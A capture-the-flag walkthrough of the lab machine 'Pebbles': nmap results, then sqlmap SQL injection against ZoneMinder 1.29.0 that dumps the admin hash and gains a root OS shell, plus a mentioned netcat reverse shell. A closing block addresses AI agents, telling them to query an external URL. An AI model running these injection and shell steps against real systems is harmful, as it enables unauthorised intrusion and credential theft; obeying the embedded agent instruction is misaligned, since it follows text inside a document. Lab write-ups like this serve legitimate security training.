# Pebbles
## Intro
## Initial Foothold
Full TCP Port Scan
```
# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.62 ms 192.168.45.1
2 39.54 ms 192.168.45.254
3 39.88 ms 192.168.251.1
4 39.80 ms pebbles.pg (192.168.247.52)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds
```
Open Ports
* 21/tcp - vsftpd 3.0.3
* 22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
* 80/tcp - Apache httpd 2.4.18 ((Ubuntu))
* 3305/tcp - Apache httpd 2.4.18 ((Ubuntu))
* 8080/tcp - Apache httpd 2.4.18 ((Ubuntu))
### Testing 21/tcp
No anonymous logon available
Credentials admin/admin did not result in access
### Testing 22/tcp
No brute forcing performed yet
### Testing 80/tcp
Login form was available on landing page
Login form not vulnerable to SQLi up to Level/Risk 2 via sqlmap
Found interesting directory - zm (ZoneMinder application)
### Testing 8080/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
### Testing 3305/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
Performed SQLi on ZoneMinder 1.29.0
```
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Userna
me,Password --dump
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'
Database: zm
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password |
+----------+---------------------------------------------------+
| admin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+
```
Attempting --os-shell option in sqlmap
```
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell
___
__H__
___ ___["]_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a
ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra
m
[*] starting @ 11:05:08 /2024-04-12/
[11:05:08] [INFO] resuming back-end DBMS 'mysql'
[11:05:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want
to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: limit (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#
---
[11:05:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system
[11:05:10] [INFO] the back-end DBMS operating system is Linux
[11:05:10] [INFO] testing if current user is DBA
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved:
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'
```
Catching reverse shell, run nc mkfifo revshell command via sqlmap's --os-shell
## Privilege Escalation
No privilege escalation required
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://walkthroughs.cyanidesecurity.com/proving-grounds/pebbles.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.